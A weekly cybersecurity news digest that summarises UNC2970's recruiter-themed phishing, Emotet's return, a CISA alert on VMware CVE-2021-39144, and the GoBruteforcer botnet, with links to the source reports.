[CyberLand News] Weekly #4 - Threats and Malware
Last news on threats, malware and vulnerabilties in the cyber land
Contents
New malware families for UNC2970
Emotet Returns
CISA alert on CVE-2021-39144
Exposed Services targeted by GoBruteforcer malware
New malware families for UNC2970
The North Korean cyber espionage group known as UNC2970 has been using previously unknown malware families to conduct a spear-phishing campaign targeting media and technology organizations in the US and Europe since June 2022. UNC2970 is the new name given to a North Korean cyber activity that was previously tracked as UNC577 (also known as Temp.Hermit) and also includes a new threat cluster called UNC4034.
In September 2022, Mandiant documented the use of WhatsApp by UNC4034 to socially engineer targets into downloading a backdoor called AIRDRY.V2 under the pretext of sharing a skills assessment test. Temp.Hermit is a primary hacking unit associated with North Korea's Reconnaissance General Bureau (RGB) along with Andariel and APT38 (also known as BlueNoroff), and all three actor sets are collectively referred to as the Lazarus Group (also known as Hidden Cobra or Zinc).
The latest set of attacks by UNC2970 begins by directly approaching users on LinkedIn using fake accounts posing as recruiters that are "well designed and professionally curated." The conversation is then moved to WhatsApp, where a phishing payload is delivered to the target under the guise of a job description. UNC2970 has also reportedly used Microsoft Intune, an endpoint management solution, to drop a bespoke PowerShell script containing a Base64-encoded payload called CLOUDBURST, a C-based backdoor that communicates via HTTP.
More details in “Stealing the LIGHTSHOW (Part One) — North Korea's UNC2970“ / “Stealing the LIGHTSHOW (Part Two) — LIGHTSHIFT and LIGHTSHOW“
More details in “It's Time to PuTTY! DPRK Job Opportunity Phishing via WhatsApp“
Emotet Returns
The Emotet malware has resurfaced after a three-month hiatus, spamming malicious emails once again and rebuilding its network to infect devices worldwide. This infamous malware is spread through email with malicious attachments containing Microsoft Word and Excel documents. When users open these documents and enable macros, the Emotet DLL is downloaded and loaded into memory.
Once Emotet has been loaded, it remains dormant, awaiting instructions from a remote command and control server. Eventually, the malware steals victims' emails and contacts for future Emotet campaigns or downloads additional payloads such as Cobalt Strike or other malware that commonly leads to ransomware attacks.
Despite being considered the most widely distributed malware in the past, Emotet's activity has gradually slowed down, with its last spam operation occurring in November 2022, which only lasted two weeks.
More details in “Emotet Sending Malicious Emails After Three-Month Hiatus“
More details in “Emotet malware attacks return after three-month break“
CISA alert on CVE-2021-39144
The Cybersecurity and Infrastructure Security Agency (CISA) has included a highly severe vulnerability in VMware's Cloud Foundation to its list of security flaws being actively exploited. This vulnerability (identified as CVE-2021-39144) was discovered in the XStream open-source library used by vulnerable VMware products and has been given a severity score of 9.8 out of 10 by VMware.
The vulnerability can be exploited by unauthenticated threat actors in simple attacks that do not require user interaction to remotely execute arbitrary code with root privileges on unpatched devices.
More details in “Advisories VMSA-2022-0027.1“
Exposed Services targeted by GoBruteforcer malware
Researchers at Unit 42 have uncovered a new variant of Golang-based malware, which they have dubbed GoBruteforcer. The malware targets web servers that run phpMyAdmin, MySQL, FTP, and Postgres services, and was initially detected by the team's Next-Generation Firewall. After conducting a deeper investigation, they discovered that the malware was hosted on a legitimate website.
Further analysis of the malware revealed that the attacker had created binaries for x86, x64, and ARM processor architectures. Additionally, GoBruteforcer deployed an internet relay chat (IRC) bot on the victim server, which communicates with the attacker's server.
It is important to note that successful execution of the samples is contingent on specific conditions on the victim system, such as the use of certain arguments and the presence of targeted services with weak passwords.
The GoBruteforcer malware employs a multiscan module to identify potential targets in a Classless Inter-Domain Routing (CIDR) range, providing a broad pool of targets to infiltrate networks. The malware first selects a CIDR block and subsequently targets all IP addresses within that range.
Rather than focusing on a single IP address, the malware opts for CIDR block scanning, which enables it to access a wider range of hosts on multiple IP addresses, significantly increasing the scope of the attack.
As the GoBruteforcer botnet is likely undergoing active development, its operators are expected to evolve their tactics and the malware's capabilities to effectively target web servers and stay ahead of security defenses.
More details in “GoBruteforcer: Golang-Based Botnet Actively Harvests Web Servers“
A.I. support for text and images